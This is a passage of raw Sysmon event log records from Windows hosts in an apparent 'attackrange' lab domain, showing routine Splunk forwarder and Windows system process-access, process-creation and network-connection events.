12:21:20.382{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62365-false10.0.1.12-8089- 10341000x8000000000000000439568Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:23.036{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439567Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:23.036{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439566Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:23.022{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84873DA351BBA800F456E9AA56FA7242,SHA256=3E9778B7AE969E5E6AFBD823EC083D3345E3ABB56EDFC084A66A042701045625,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291008Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.920{BEA10069-01C3-6088-E929-00000000BB01}67641504C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291007Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.789{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-01C3-6088-E929-00000000BB01}6764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291006Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.789{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291005Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.789{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291004Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.789{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291003Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.789{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291002Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.789{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291001Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.789{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291000Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.789{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000290999Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.789{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000290998Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.789{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000290997Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.789{BEA10069-D0C1-6086-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{BEA10069-01C3-6088-E929-00000000BB01}6764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000290996Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.789{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-01C3-6088-E929-00000000BB01}6764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000290995Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.789{BEA10069-01C3-6088-E929-00000000BB01}6764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000290994Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.673{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0CDDB808BCFBB8055EF191CAC2D30804,SHA256=94C56ECB73584699AA0713D1F5CD1DD87BDEF2F23CBFF575BE9436F94F65AE34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000290993Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.319{BEA10069-01C3-6088-E829-00000000BB01}58925764C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000290992Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.187{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-01C3-6088-E829-00000000BB01}5892C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000290991Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.187{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000290990Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.187{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000290989Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.187{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000290988Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.187{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000290987Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.187{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000290986Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.187{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000290985Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.187{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000290984Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 